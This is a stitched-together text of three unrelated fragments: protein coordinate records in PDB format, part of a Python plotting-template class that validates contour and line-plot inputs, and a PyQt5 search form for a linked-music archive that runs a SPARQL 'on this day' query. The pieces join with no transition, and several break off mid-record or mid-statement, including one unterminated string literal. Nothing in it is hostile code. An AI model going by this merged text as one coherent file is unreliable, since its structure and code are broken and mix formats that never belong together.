ATOM 95 CG LYS B 10 173.145 129.047 139.180 1.00121.76 C
ATOM 96 CD LYS B 10 173.936 129.596 140.357 1.00118.67 C
ATOM 97 CE LYS B 10 173.984 128.597 141.501 1.00128.53 C
ATOM 98 NZ LYS B 10 172.623 128.251 141.996 1.00136.83 N
TER
ATOM 99 N GLU C 3 135.020 157.489 151.546 1.00 97.12 N
ATOM 100 CA GLU C 3 134.486 156.151 151.769 1.00 97.12 C
ATOM 101 C GLU C 3 133.592 155.717 150.612 1.00 97.12 C
ATOM 102 O GLU C 3 133.050 156.556 149.891 1.00 97.12 O
ATOM 103 CB GLU C 3 133.707 156.096 153.084 1.00 78.85 C
ATOM 104 N LYS C 4 133.446 154.403 150.449 1.00109.02 N
ATOM 105 CA LYS C 4 132.646 153.820 149.375 1.00109.02 C
ATOM 106 C LYS C 4 133.085 154.333 148.006 1.00109.02 C
ATOM 107 O LYS C 4 134.276 154.544 147.772 1.00109.02 O
ATOM 108 CB LYS C 4 131.157 154.106 149.593 1.00 74.21 C
ATOM 109 N ARG C 5 132.114 154.528 147.117 1.00123.74 N
ATOM 110 CA ARG C 5 132.365 155.018 145.760 1.00123.74 C
ATOM 111 C ARG C 5 133.399 154.165 145.034 1.00123.74 C
ATOM 112 O ARG C 5 134.229 154.680 144.283 1.00123.74 O
ATOM 113 CB ARG C 5 132.819 156.480 145.794 1.00 88.74 C
ATOM 114 N LEU C 6 133.343 152.857 145.263 1.00134.34 N
ATOM 115 CA LEU C 6 134.303 151.929 144.680 1.00125.94 C
ATOM 116 C LEU C 6 134.118 151.794 143.172 1.00117.79 C
ATOM 117 O LEU C 6 133.035 151.448 142.699 1.00116.34 O
ATOM 118 CB LEU C 6 134.187 150.557 145.347 1.00128.27 C
ATOM 119 N SER C 7 135.180 152.070 142.425 1.00122.42 N
ATOM 120 CA SER C 7 135.159 151.916 140.975 1.00117.74 C
ATOM 121 C SER C 7 135.505 150.483 140.593 1.00113.00 C
ATOM 122 O SER C 7 136.662 150.071 140.680 1.00 99.07 O
ATOM 123 CB SER C 7 136.133 152.893 140.314 1.00118.03 C
ATOM 124 OG SER C 7 137.463 152.652 140.736 1.00103.22 O
ATOM 125 N ALA C 8 134.499 149.725 140.169 1.00116.62 N
ATOM
results['xlim']: (`left`, `right`), optional
results['ylim']: (`up`, `down`), optional
results['plot_method']: str, optional
'contourf', 'pcolor', 'pcolormesh', or 'plot_surface'
default 'contourf', if 'Z' all zeros, default is 'pcolormesh'
results['plot_method_args']: list, optional
args for *plot_method*, like levels for 'contourf'
results['plot_method_kwargs']: dict, optional
kwargs for *plot_method*,
like cmap for 'plot_surface', default in style
results['clabel_levels']: list, optional
contour levels at which to draw labelled contour lines
(no contour labels are drawn when this is empty).
The values will be sorted in increasing order.
results['colorbar']: bool, optional
add colorbar or not, default True
results['grid_alpha']: float, optional
transparency of grid, use this when 'grid.alpha' has no effect
results['plot_surface_shadow']: list, optional
add contourf in a surface plot, ['x', 'y', 'z'], default []
'''
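# A minimal sketch of the expected `results` dict (illustrative only; only
# numpy is assumed, and the data values are arbitrary):
#
#   x = numpy.linspace(0.0, 1.0, 64)
#   y = numpy.linspace(0.0, 2.0, 32)
#   z = numpy.random.rand(32, 64)      # shape must be (len(Y), len(X))
#   results = dict(X=x, Y=y, Z=z, title='demo', xlabel='x', ylabel='y',
#                  plot_method='contourf', colorbar=True)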
if not ('X' in results
and 'Y' in results and 'Z' in results):
vlog.error("`X`, `Y` and `Z` are required!")
return [], []
for _x in ['X', 'Y', 'Z']:
if not isinstance(results[_x], numpy.ndarray):
vlog.error("`%s` must be a numpy.ndarray!" % _x)
return [], []
X = results['X']
Y = results['Y']
Z = results['Z']
if len(X.shape) == 1 and len(Y.shape) == 1:
# X, Y: 1 dimension
if (len(Y), len(X)) != Z.shape:
vlog.error("Invalid `X`, `Y` length or `Z` shape! (%d,%d)!=%s"
% (len(Y), len(X), Z.shape))
return [], []
X, Y = numpy.meshgrid(X, Y)
elif len(X.shape) == 2 and len(Y.shape) == 2:
# X, Y: 2 dimension
if not (X.shape == Y.shape == Z.shape):
vlog.error("Invalid `X`, `Y` or `Z` shape!")
return [], []
else:
vlog.error("Invalid `X`, `Y` dimension!")
return [], []
title, xlabel, ylabel, aspect = self._get_my_optional_vals(
results, ('title', str, None), ('xlabel', str, None),
('ylabel', str, None), ('aspect', str, None))
xlim, ylim = self._get_my_points(results, 'xlim', 'ylim')
plot_method, plot_method_args, plot_method_kwargs, \
clabel_levels, colorbar, grid_alpha, plot_surface_shadow = \
self._get_my_optional_vals(results,
('plot_method', str, 'contourf'),
('plot_method_args', list, []),
('plot_method_kwargs', dict, {}),
('clabel_levels', list, []),
('colorbar', bool, True),
('grid_alpha', float, None),
('plot_surface_shadow', list, []))
if plot_method not in ('contourf', 'pcolor', 'pcolormesh',
'plot_surface'):
plot_method = 'contourf'
if plot_method == 'contourf' and not Z.any():
# all zeros
vlog.warning("All elements are 0, use plot_method pcolormesh!")
plot_method = 'pcolormesh'
if clabel_levels:
clabel_levels = sorted(clabel_levels)
plot_surface_shadow = list(filter(
lambda x: x in ('x', 'y', 'z'),
plot_surface_shadow))
vlog.debug("Some template contourf parameters: %s" % [
plot_method, plot_method_args, plot_method_kwargs,
colorbar, grid_alpha, plot_surface_shadow])
return self._tmpl_contourf(
X, Y, Z, title, xlabel, ylabel, aspect, xlim, ylim,
plot_method, plot_method_args, plot_method_kwargs,
clabel_levels, colorbar, grid_alpha, plot_surface_shadow)
def _tmpl_contourf(
self, X, Y, Z, title, xlabel, ylabel, aspect, xlim, ylim,
plot_method, plot_method_args, plot_method_kwargs,
clabel_levels, colorbar, grid_alpha, plot_surface_shadow):
'''For :meth:`tmpl_contourf`.'''
raise NotImplementedError()
def tmpl_line(self, results):
'''
Template
--------
.. code::
title
+--------+
ylabel | Line2D |
+--------+
xlabel
or
title
/|\
/ | \
/ | \
| / \ |
| / \ | zlabel
|/ Line \|
\ 3D /
xlabel \ / ylabel
\ /
Parameters
----------
results['LINE']: list of tuple, required
all line info for the axes
2D example [(x1, y1, label1), (x2, y2, label2), (x3, y3)]
3D example [(x1, y1, z1, label1), (x2, y2, z2)]
'x1', 'y1', 'z1', list or numpy.ndarray, same length
results['title']: str, optional
results['xlabel']: str, optional
results['ylabel']: str, optional
results['aspect']: str, optional
results['lin3d']: bool, optional for 3D, default False
results['zlabel']: str, optional for 3D
results['scale_xyz']: tuple, optional for 3D
like ([-1,1], [-1,1], [-1,1])
results['xlim']: (`left`, `right`), optional
results['ylim']: (`up`, `down`), optional
results['ylabel_rotation']: str or int, optional
results['legend_kwargs']: dict, optional
legend kwargs
'''
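# A minimal sketch of the expected `results` dict for the 2D case
# (illustrative only; the data values are arbitrary):
#
#   x = numpy.linspace(0.0, 6.28, 100)
#   results = dict(LINE=[(x, numpy.sin(x), 'sin'), (x, numpy.cos(x), 'cos')],
#                  title='demo', xlabel='x', ylabel='y')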
if 'LINE' not in results:
vlog.error("`LINE` is required!")
return [], []
if not isinstance(results['LINE'], list):
vlog.error("`LINE` must be a list!")
return [], []
if results.get('lin3d', False):
lin3d, d3, d3n = True, 1, [(2, 'Z')]
else:
lin3d, d3, d3n = False, 0, []
for i, line in enumerate(results['LINE'], 1):
if len(line) in (2+d3, 3+d3):
for _x, _X in [(0, 'X'), (1, 'Y')] + d3n:
if not isinstance(line[_x], (list, range, numpy.ndarray)):
vlog.error("%s of line %d must be array!" % (_X, i))
return [], []
if len(line[0]) != len(line[1]):
vlog.error("Invalid length of x, y for line %d! %d!=%d"
% (i, len(line[0]), len(line[1])))
return [], []
if d3 and len(line[0]) != len(line[2]):
vlog.error("Invalid length of x, z for line %d! %d!=%d"
% (i, len(line[0]), len(line[2])))
return [], []
else:
vlog.error("Length of info for line %d must be %d or %d!"
% (i, 2+d3, 3+d3))
return [], []
LINE = results['LINE']
title, xlabel, ylabel, aspect = self._get_my_optional_vals(
results, ('title', str, None), ('xlabel', str, None),
('ylabel', str, None), ('aspect', str, None))
zlabel, scale_xyz = self._get_my_optional_vals(
results, ('zlabel', str, None), ('scale_xyz', tuple, None))
xlim, ylim = self._get_my_points(results, 'xlim', 'ylim')
ylabel_rotation, legend_kwargs = self._get_my_optional_vals(
results, ('ylabel_rotation', (int, str), None),
('legend_kwargs', dict, {}))
return self._tmpl_line(
LINE, title, xlabel, ylabel, aspect,
lin3d, zlabel, scale_xyz,
xlim, ylim, ylabel_rotation, legend_kwargs)
def _tmpl_line(self, LINE, title, xlabel, ylabel, aspect,
lin3d, zlabel, scale_xyz,
xlim, ylim, ylabel_rotation, legend_kwargs):
'''For :meth:`tmpl_line`.'''
raise NotImplementedError()
def tmpl_sharextwinx(self, results):
'''
Template
--------
.. code::
title
+--------+
ylabel | axes 1 | ylabel
+--------+
ylabel | axes 2 | ylabel
+--------+
xlabel
Parameters
----------
results['X']: list or numpy.ndarray, required
1 dimension array
results['YINFO']: list of dict, required
all info for the axes
results['hspace']: float, optional
height space between subplots, default 0.02
results['title']: str, optional
default None
results['xlabel']: str, optional
default None
results['xlim']: (`left`, `right`), optional
default [min(X), max(X)]
results['ylabel_rotation']: str or int, optional
default 'vertical'
Notes
-----
Form of *YINFO*.
.. code:: python
YINFO = [{
# axes 1
'left': [(ydata1,), (ydata2, label2)], # required
'right': [(xdata3, ydata3), (xdata4, ydata4, label4)],
'llegend': dict(loc='upper left'), # optional
'rlegend': dict(loc='upper right'), # optional
'lylabel': 'left ylabel', # optional
'rylabel': 'right ylabel', # optional
}, {
# axes 2
'left': [([1,...,9], 'line')], 'right': [], # required
'lylabel': 'Y2',
}]
yinfo[0]['left'][0]: len(ydata1) == len(X)
yinfo[1]['right']: can be empty list
yinfo[0]['llegend']: optional kwargs for legend
'''
# check
if not ('X' in results and 'YINFO' in results):
vlog.error("`X` and `YINFO` are required!")
return [], []
if isinstance(results['X'], (list, range, numpy.ndarray)):
X = results['X']
else:
vlog.error("`X` must be array!")
return [], []
if not isinstance(results['YINFO'], list):
vlog.error("`YINFO` must be a list!")
return [], []
for i, ax in enumerate(results['YINFO'], 1):
if not (isinstance(ax, dict) and 'left' in ax and 'right' in ax):
vlog.error("Info of axes %d must be a dict! "
"Keys 'left' and 'right' must be in it!" % i)
return [], []
for lr in ['left', 'right']:
for j, line in enumerate(ax[lr], 1):
if not isinstance(line[0], (list, range, numpy.ndarray)):
vlog.error(
"Line %d (0y/0x) in axes %d %s must be array!"
% (j, i, lr))
return [], []
if (len(line) == 2 and isinstance(line[1], str)
and len(line[0]) != len(X)):
vlog.error(
"Invalid len of line%d(0y) in axes %d %s! %d!=%d"
% (j, i, lr, len(line[0]), len(X)))
return [], []
if (len(line) >= 2 and isinstance(line[1], (list, range, numpy.ndarray))
and len(line[0]) != len(line[1])):
vlog.error(
"Invalid len of line%d(0x,1y) in axes %d %s! %d!=%d"
% (j, i, lr, len(line[0]), len(line[1])))
return [], []
YINFO = results['YINFO']
hspace, title, xlabel, ylabel_rotation = self._get_my_optional_vals(
results, ('hspace', float, 0.02), ('title', str, None),
('xlabel', str, None), ('ylabel_rotation', (int, str), 'vertical')
)
xlim, = self._get_my_points(results, 'xlim')
if not xlim:
xlim = [numpy.min(X), numpy.max(X)]
return self._tmpl_sharextwinx(
X, YINFO,
hspace, title, xlabel, xlim, ylabel_rotation)
def _tmpl_sharextwinx(
self, X, YINFO,
hspace, title, xlabel, xlim, ylabel_rotation):
'''For :meth:`tmpl_sharextwinx`.'''
raise NotImplementedError()
def tmpl_z111p(self, results):
'''
Zip axes from other templates that return only one axes.
Parameters
----------
results['zip_results']: list of tuple, required
[(name1, pos1, results1), (name2, pos2, results2)]
name1: template's name in :attr:`template_available`
pos1: new position, int 221, or [a,b,c,d] etc
results1: results for template name1
results['suptitle']: str, optional
Notes
-----
1. All *add_style* from other templates are ignored!
2. If axes use same *pos*, results data will be merged(append),
layout only use first one.
'''
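# A minimal sketch of the expected `results` dict (illustrative only;
# `results_a` and `results_b` stand for valid inputs of the named templates,
# which are assumed to be listed in `template_available`):
#
#   results = dict(zip_results=[
#       ('tmpl_contourf', 211, results_a),
#       ('tmpl_line', 212, results_b),
#   ], suptitle='two stacked axes')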
if 'zip_results' not in results:
vlog.error("`zip_results` is required!")
return [], []
if not isinstance(results['zip_results'], list):
vlog.error("`zip_results` must be a list!")
return [], []
zip_results = []
for i, _results in enumerate(results['zip_results'], 0):
if len(_results) != 3:
vlog.error("`zip_results[%d]`: invalid length!=3!" % i)
continue
temp, pos, _res = _results
try:
template_method = getattr(self, temp)
except AttributeError:
vlog.error("`zip_results[%d]`:
from PyQt5 import QtCore, QtWidgets, QtGui
from PyQt5.QtWebEngineWidgets import QWebEngineView
import application
import cache
import view
from math import sin, cos, sqrt, atan2, radians
import graph
import time
import traceback
import sys
class searchForm():
"""
Initializes an instance of the search form, which contains the search and results tabs.
"""
def __init__(self, app, parent=None):
"""
Create an instance of the search form class.
Parameters
----------
app : instance
Reference to the main application module.
"""
# Store reference to main-level tab
self.app = app
self.topLevelTab = app.searchTab
self.topLevelSearchLayout = QtWidgets.QHBoxLayout()
self.leftSide = self.generate_left_side()
self.rightSide = self.generate_right_side()
self.topLevelSearchLayout.addWidget(self.leftSide)
self.topLevelSearchLayout.addWidget(self.rightSide)
# Set spanning between left / right sides of top-level layout
self.topLevelSearchLayout.setStretch(0, 2)
self.topLevelSearchLayout.setStretch(1, 8)
# Set auto-completes
self.artistFilter.setCompleter(self.app.auto_comp(self.app.cache.load('artistList')))
self.genreFilter.setCompleter(self.app.auto_comp(self.app.cache.load('genreList')))
self.locationFilter.setCompleter(self.app.auto_comp(self.app.cache.load('newReversedGroupedLocations')))
self.countryFilter.setCompleter(self.app.auto_comp(self.app.cache.load('countries')))
# Set layout
self.topLevelTab.setLayout(self.topLevelSearchLayout)
def generate_left_side(self):
"""
Generates the left side of the search form (not the data views, but the search form, results tab,
and all widgets held within).
"""
# Create our search form
self.searchFormVerticalWidget = QtWidgets.QWidget(self.app.searchTab)
self.searchFormVerticalLayout = QtWidgets.QVBoxLayout(self.searchFormVerticalWidget)
self.searchFormVerticalLayout.addWidget(self.generate_search_tab())
self.searchBtn = QtWidgets.QPushButton('Perform Search')
self.searchFormVerticalLayout.addWidget(self.searchBtn)
# self.searchBtn.clicked.connect(self.search_button_clicked)
self.searchFormVerticalWidget.setLayout(self.searchFormVerticalLayout)
# Create our results side?
self.resultsFormVerticalWidget = QtWidgets.QWidget(self.app.searchTab)
self.resultsFormVerticalLayout = QtWidgets.QVBoxLayout(self.resultsFormVerticalWidget)
self.resultsFormVerticalLayout.addWidget(self.create_results_view())
# Wrap this within our left-side tab interface for swapping between results, and the search form
self.leftSideWidget = QtWidgets.QTabWidget(self.app.searchTab)
self.leftSideWidget.setTabPosition(2)  # 2 == QTabWidget.West (tabs on the left edge)
self.leftSideWidget.addTab(self.searchFormVerticalWidget, 'Search Form')
self.leftSideWidget.addTab(self.resultsFormVerticalWidget, 'Results')
# self.leftSideWidget.setTabEnabled(1, False)
# Signal for performing a search
self.searchBtn.clicked.connect(self.app.searchHandler.perform_search)
return self.leftSideWidget
def generate_on_this_day(self):
"""
Generates a default view (shown during start-up) of performances that took place on this
day and month in history.
"""
q = """
PREFIX etree:<http://etree.linkedmusic.org/vocab/>
PREFIX mo:<http://purl.org/ontology/mo/>
PREFIX event:<http://purl.org/NET/c4dm/event.owl#>
PREFIX skos:<http://www.w3.org/2004/02/skos/core#>
PREFIX rdf:<http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX calma: <http://calma.linkedmusic.org/vocab/>
PREFIX foaf:<http://xmlns.com/foaf/0.1/>
SELECT DISTINCT ?label ?name ?place ?location ?date (group_concat(distinct ?calma; separator = "\\n") AS ?calma) WHERE {{
?art skos:prefLabel ?label.
?art mo:performer ?performer.
?art etree:description ?description.
?performer foaf:name ?name.
?art event:place ?location.
?art etree:date ?date.
?location etree:location ?place.
?art event:hasSubEvent ?subEvent
OPTIONAL {{?performer etree:mbTag ?genre}}.
OPTIONAL {{?subEvent calma:data ?calma}}.
FILTER (regex(?date,'{0}', 'i'))
}}
ORDER BY ?name
LIMIT 25
""".format(time.strftime('-%m-%d'))
results = self.app.sparql.execute_string(q)
self.app.searchHandler.setup_views(['map', 'table', 'timeline', 'today in history'], results)
self.app.searchHandler.lastQueryExecuted = q
def generate_right_side(self):
"""
Generates the right side of the search form (data views).
"""
self.rightSideWidget = QtWidgets.QWidget(self.app.searchTab)
self.rightSideLayout = QtWidgets.QVBoxLayout()
return self.rightSideWidget
def generate_search_tab(self):
self.searchFormTabs = QtWidgets.QTabWidget()
self.searchFormTabs.addTab(self.generate_search_form_general(), 'General')
self.searchFormTabs.addTab(self.generate_search_form_geography(), 'Geography')
self.searchFormTabs.addTab(self.generate_search_form_advanced(), 'Advanced')
self.searchFormTabs.addTab(self.generate_search_form_views(), 'Views')
return self.searchFormTabs
def generate_search_form_general(self):
# Create layout and widget to place contents in
self.searchGeneralLayout = QtWidgets.QGridLayout()
self.searchGeneralWidget = QtWidgets.QWidget(self.app.searchTab)
# Artist field
self.artistFilterLbl = QtWidgets.QLabel('Artist')
self.artistFilter = QtWidgets.QLineEdit()
self.searchGeneralLayout.addWidget(self.artistFilterLbl, 0, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.artistFilter, 0, 3, 1, 1)
# Genre field
self.genreFilterLbl = QtWidgets.QLabel('Genre')
self.genreFilter = QtWidgets.QLineEdit()
self.searchGeneralLayout.addWidget(self.genreFilterLbl, 1, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.genreFilter, 1, 3, 1, 1)
# Track name field
self.trackNameLbl = QtWidgets.QLabel('Track Name')
self.trackNameFilter = QtWidgets.QLineEdit()
self.searchGeneralLayout.addWidget(self.trackNameLbl, 2, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.trackNameFilter, 2, 3, 1, 1)
# Start date field
self.dateFromLbl = QtWidgets.QLabel('From Date')
self.dateFrom = QtWidgets.QDateEdit()
self.dateFrom.setDisplayFormat('dd-MM-yyyy')
self.dateFrom.setDateTime(QtCore.QDateTime(QtCore.QDate(1950, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateFrom.setMaximumDate(QtCore.QDate(2016, 1, 1))
self.searchGeneralLayout.addWidget(self.dateFromLbl, 3, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.dateFrom, 3, 3, 1, 1)
# End date field
self.dateToLbl = QtWidgets.QLabel('To Date')
self.dateTo = QtWidgets.QDateEdit()
self.dateTo.setDisplayFormat('dd-MM-yyyy')
self.dateTo.setDateTime(QtCore.QDateTime(QtCore.QDate(2017, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateTo.setMaximumDate(QtCore.QDate(2017, 1, 1))
self.searchGeneralLayout.addWidget(self.dateToLbl, 4, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.dateTo, 4, 3, 1, 1)
# # Order-by field
self.orderByLbl = QtWidgets.QLabel('Order By')
self.orderByFilter = QtWidgets.QComboBox()
self.orderByFilter.addItem('Artist')
self.orderByFilter.addItem('Date')
self.orderByFilter.addItem('Genre')
self.orderByFilter.addItem('Label')
self.orderByFilter.addItem('Location')
self.searchGeneralLayout.addWidget(self.orderByLbl, 5, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.orderByFilter, 5, 3, 1, 1)
# Num results field
self.numResultsLbl = QtWidgets.QLabel('No. Results')
self.numResultsSpinbox = QtWidgets.QSpinBox()
self.numResultsSpinbox.setMaximum(10000)
self.numResultsSpinbox.setProperty("value", 500)
self.searchGeneralLayout.addWidget(self.numResultsLbl, 6, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.numResultsSpinbox, 6, 3, 1, 1)
# CALMA-available only field
self.hasCalmaLbl = QtWidgets.QLabel('Has CALMA')
self.hasCalmaCheck = QtWidgets.QCheckBox()
self.searchGeneralLayout.addWidget(self.hasCalmaLbl, 7, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.hasCalmaCheck, 7, 3, 1, 1)
# Set layout to widget
self.searchGeneralWidget.setLayout(self.searchGeneralLayout)
# Return widget
return self.searchGeneralWidget
def generate_search_form_geography(self):
# Create layout and widget to place contents in
self.searchGeographyLayout = QtWidgets.QGridLayout()
self.searchGeographyWidget = QtWidgets.QWidget()
# Venue field
self.venueFilterLbl = QtWidgets.QLabel('Venue')
self.venueFilter = QtWidgets.QLineEdit()
self.searchGeographyLayout.addWidget(self.venueFilterLbl, 0, 1, 1, 1)
self.searchGeographyLayout.addWidget(self.venueFilter, 0, 3, 1, 1)
# Location field
self.locationFilterLbl = QtWidgets.QLabel('Location')
self.locationFilter = QtWidgets.QLineEdit()
self.searchGeographyLayout.addWidget(self.locationFilterLbl, 1, 1, 1, 1)
self.searchGeographyLayout.addWidget(self.locationFilter, 1, 3, 1, 1)
# Range field
self.locationRangeFilterLbl = QtWidgets.QLabel('Range (KM)')
self.locationRangeFilter = QtWidgets.QLineEdit()
self.searchGeographyLayout.addWidget(self.locationRangeFilterLbl, 2, 1, 1, 1)
self.searchGeographyLayout.addWidget(self.locationRangeFilter, 2, 3, 1, 1)
# Country field
self.countryFilterLbl = QtWidgets.QLabel('Country')
self.countryFilter = QtWidgets.QLineEdit()
self.searchGeographyLayout.addWidget(self.countryFilterLbl, 3, 1, 1, 1)
self.searchGeographyLayout.addWidget(self.countryFilter, 3, 3, 1, 1)
# Set layout to widget
self.searchGeographyWidget.setLayout(self.searchGeographyLayout)
# Return widget
return self.searchGeographyWidget
def generate_search_form_views(self):
# Create layout and widget to place contents in
self.searchViewsLayout = QtWidgets.QGridLayout()
self.searchViewsWidget = QtWidgets.QWidget()
# Create check-boxes
self.mapViewChk = QtWidgets.QCheckBox()
self.mapViewChk.setText('Map')
self.tableViewChk = QtWidgets.QCheckBox()
self.tableViewChk.setText('Table')
self.timelineViewChk = QtWidgets.QCheckBox()
self.timelineViewChk.setText('Feature Analyses')
# Set all to checked by default
self.mapViewChk.setChecked(True)
self.tableViewChk.setChecked(True)
self.timelineViewChk.setChecked(True)
# Add widgets to layout
# self.searchViewsLayout.addWidget(self.tableViewChk, 1, 1, 1, 1)
self.searchViewsLayout.addWidget(self.mapViewChk, 3, 1, 1, 1)
self.searchViewsLayout.addWidget(self.timelineViewChk, 5, 1, 1, 1)
# Set layout to widget
self.searchViewsWidget.setLayout(self.searchViewsLayout)
# Return widget
return self.searchViewsWidget
def generate_search_form_advanced(self):
# Create layout and widget to place contents in
self.searchAdvancedLayout = QtWidgets.QVBoxLayout()
self.searchAdvancedWidget = QtWidgets.QWidget()
# Buttons and labels for adding / removing conditions
self.advancedConditionLbl = QtWidgets.QLabel('Match')
self.matchingPolicyCombo = QtWidgets.QComboBox()
self.matchingPolicyCombo.addItem("ALL")
self.matchingPolicyCombo.addItem("OR")
self.addConditionBtn = QtWidgets.QPushButton('+')
self.removeConditionBtn = QtWidgets.QPushButton('-')
self.searchAdvancedControlsLayout = QtWidgets.QHBoxLayout()
self.searchAdvancedControlsLayout.addWidget(self.advancedConditionLbl)
self.searchAdvancedControlsLayout.addWidget(self.matchingPolicyCombo)
self.searchAdvancedControlsLayout.addWidget(self.addConditionBtn)
self.searchAdvancedControlsLayout.addWidget(self.removeConditionBtn)
self.searchAdvancedControlsWidget = QtWidgets.QWidget()
self.searchAdvancedControlsWidget.setLayout(self.searchAdvancedControlsLayout)
# Layout for adding conditions to
self.advancedSearchLayout = QtWidgets.QGridLayout()
self.advancedSearchWidget = QtWidgets.QWidget()
self.advancedSearchWidget.setLayout(self.advancedSearchLayout)
# Add both widgets to upper layout
self.searchAdvancedLayout.addWidget(self.searchAdvancedControlsWidget)
self.searchAdvancedLayout.addWidget(self.advancedSearchWidget)
self.searchAdvancedLayout.setStretch(0, 1)
self.searchAdvancedLayout.setStretch(1, 20)
# Add signals for communication
self.addConditionBtn.pressed.connect(self.app.searchHandler.add_custom_condition)
self.removeConditionBtn.pressed.connect(self.app.searchHandler.remove_custom_condition)
# Set layout to widget
self.searchAdvancedWidget.setLayout(self.searchAdvancedLayout)
# Return widget
return self.searchAdvancedWidget
def change_proportions(self):
# Account for possibility of default form (with an additional element at the top)
if self.app.searchHandler.view.viewLayout.count() == 4:
offset = 1
else:
offset = 0
if (self.infoWindowWidgets['tableSpan'].value() > 0):
self.topLevelSearchLayout.itemAt(1).widget().layout().setStretch(0+offset, int(self.infoWindowWidgets['tableSpan'].value()))
# Timeline slider
if (self.infoWindowWidgets['timelineSpan'].value() > 0):
self.topLevelSearchLayout.itemAt(1).widget().layout().setStretch(2+offset, int(self.infoWindowWidgets['timelineSpan'].value()))
# Map slider
if (self.infoWindowWidgets['mapSpan'].value() > 0):
self.topLevelSearchLayout.itemAt(1).widget().layout().setStretch(1+offset, int(self.infoWindowWidgets['mapSpan'].value()))
def feature_calma_changed(self, index):
if len(self.tracklistView.selectedIndexes()) > 0:
self.app.searchHandler.view.graph_calma(self.tracklistView.selectedIndexes()[0])
def create_results_view(self):
"""
Creates a properties window for a data view.
Parameters
----------
self : instance
Class instance.
"""
# Create layouts for each tab
layoutTabLayout = QtWidgets.QGridLayout()
searchTabLayout = QtWidgets.QGridLayout()
self.infoWindowWidgets = {}
# Add sliders for adjusting the layout
layoutTabLayout.addWidget(QtWidgets.QLabel('Table Span'), 1, 0)
self.infoWindowWidgets['tableSpan'] = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.infoWindowWidgets['tableSpan'].setMaximum(10)
self.infoWindowWidgets['tableSpan'].setValue(2)
self.infoWindowWidgets['tableSpan'].setSingleStep(1)
layoutTabLayout.addWidget(self.infoWindowWidgets['tableSpan'], 1, 1)
layoutTabLayout.addWidget(QtWidgets.QLabel('Map Span'), 2, 0)
self.infoWindowWidgets['mapSpan'] = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.infoWindowWidgets['mapSpan'].setMaximum(10)
self.infoWindowWidgets['mapSpan'].setValue(6)
self.infoWindowWidgets['mapSpan'].setSingleStep(1)
layoutTabLayout.addWidget(self.infoWindowWidgets['mapSpan'], 2, 1)
layoutTabLayout.addWidget(QtWidgets.QLabel('Timeline Span'), 3, 0)
self.infoWindowWidgets['timelineSpan'] = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.infoWindowWidgets['timelineSpan'].setMaximum(10)
self.infoWindowWidgets['timelineSpan'].setValue(2)
self.infoWindowWidgets['timelineSpan'].setSingleStep(1)
layoutTabLayout.addWidget(self.infoWindowWidgets['timelineSpan'], 3, 1)
self.infoWindowWidgets['tableSpan'].sliderMoved.connect(lambda: self.change_proportions())
self.infoWindowWidgets['mapSpan'].sliderMoved.connect(lambda: self.change_proportions())
self.infoWindowWidgets['timelineSpan'].sliderMoved.connect(lambda: self.change_proportions())
# Add search button
self.infoWindowWidgets['searchButton'] = QtWidgets.QPushButton('Search')
self.infoWindowWidgets['searchBox'] = QtWidgets.QLineEdit()
searchTabLayout.addWidget(self.infoWindowWidgets['searchBox'], 1, 0)
searchTabLayout.addWidget(self.infoWindowWidgets['searchButton'], 1, 1)
searchTabLayout.addWidget(QtWidgets.QWidget(), 1, 2)
searchTabLayout.setRowStretch(0, 1)
searchTabLayout.setRowStretch(1, 12)
searchTabLayout.setRowStretch(2, 12)
# Add save tab
saveTabLayout = QtWidgets.QGridLayout()
self.infoWindowWidgets['saveButton'] = QtWidgets.QPushButton('Save Search')
self.infoWindowWidgets['saveEdit'] = QtWidgets.QLineEdit()
self.infoWindowWidgets['savePlotButton'] = QtWidgets.QPushButton('Save CALMA Plot')
saveTabLayout.addWidget(self.infoWindowWidgets['saveEdit'], 0, 0)
saveTabLayout.addWidget(self.infoWindowWidgets['saveButton'], 0, 1)
saveTabLayout.addWidget(self.infoWindowWidgets['savePlotButton'], 2, 0)
saveTabLayout.addWidget(QtWidgets.QWidget(), 3, 2)
# saveTabLayout.setRowStretch(0, 1)
# saveTabLayout.setRowStretch(1, 12)
# saveTabLayout.setRowStretch(3, 12)
# Create tracklist label for properties sub-window
self.infoWindowWidgets['tracklistLabel'] = QtWidgets.QLabel("Tracklist:")
# Add toggle for swapping between segmentation and key info for properties sub-window
self.infoWindowWidgets['toggleKeysSegments'] = QtWidgets.QComboBox()
self.infoWindowWidgets['toggleKeysSegments'].addItem('Key Changes')
self.infoWindowWidgets['toggleKeysSegments'].addItem('Segmentation')
self.infoWindowWidgets['toggleKeysSegments'].currentIndexChanged.connect(self.feature_calma_changed)
# Create individual tabs
self.tabWidget = QtWidgets.QTabWidget()
self.layoutTab = QtWidgets.QTabWidget()
self.searchTab = QtWidgets.QTabWidget()
self.saveTab = QtWidgets.QTabWidget()
self.propertiesTab = QtWidgets.QTabWidget()
# Add tracklist tab components
self.tracklistView = QtWidgets.QListWidget(self.propertiesTab)
self.tracklistLayout = QtWidgets.QVBoxLayout(self.propertiesTab)
self.tracklistLayout.addWidget(self.infoWindowWidgets['tracklistLabel'])
self.tracklistLayout.addWidget(self.infoWindowWidgets['toggleKeysSegments'])
self.tracklistLayout.addWidget(self.tracklistView)
self.tracklistWidget = QtWidgets.QWidget()
self.tracklistWidget.setLayout(self.tracklistLayout)
# Create properties tab layout
self.propertiesTreeView = application.TreePropertiesView(self.app) # QtWidgets.QTreeView(self.propertiesTab)
self.propertiesTabLayout = QtWidgets.QVBoxLayout(self.propertiesTab)
self.propertiesTabLayout.addWidget(self.propertiesTreeView)
self.propertiesTabLayout.addWidget(self.tracklistWidget)
self.propertiesTab.setLayout(self.propertiesTabLayout)
self.propertiesTreeView.header().hide()
# Set tab layouts
self.layoutTab.setLayout(layoutTabLayout)
self.searchTab.setLayout(searchTabLayout)
self.saveTab.setLayout(saveTabLayout)
# Finally, add tabs to the tab widget
